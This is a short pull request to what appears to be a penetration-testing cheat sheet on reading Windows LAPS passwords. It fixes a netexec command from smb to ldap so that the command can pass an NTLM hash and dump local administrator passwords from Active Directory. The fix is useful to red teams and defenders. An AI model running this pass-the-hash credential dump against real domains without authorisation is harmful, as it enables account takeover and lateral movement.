### PR TITLE
Update pwd-read-laps.md

### DIFF
--- a/docs/active-directory/pwd-read-laps.md
+++ b/docs/active-directory/pwd-read-laps.md
@@ -63,7 +63,7 @@ Get-AuthenticodeSignature 'c:\program files\LAPS\CSE\Admpwd.dll'
      
    * [netexec](https://github.com/Pennyw0rth/NetExec):
        ```bash
-       netexec smb 10.10.10.10 -u 'user' -H '8846f7eaee8fb117ad06bdd830b7586c' -M laps
+       netexec ldap 10.10.10.10 -u 'user' -H '8846f7eaee8fb117ad06bdd830b7586c' -M laps
        ```
 
    * [LAPSDumper](https://github.com/n00py/LAPSDumper) 


### PR DESCRIPTION
Correct protocol from smb to ldap because following error message.

[-] Module LAPS is not supported for protocol smb
![image](https://github.com/user-attachments/assets/1cd50ad8-b803-4ba3-813e-dec07617b3bc)
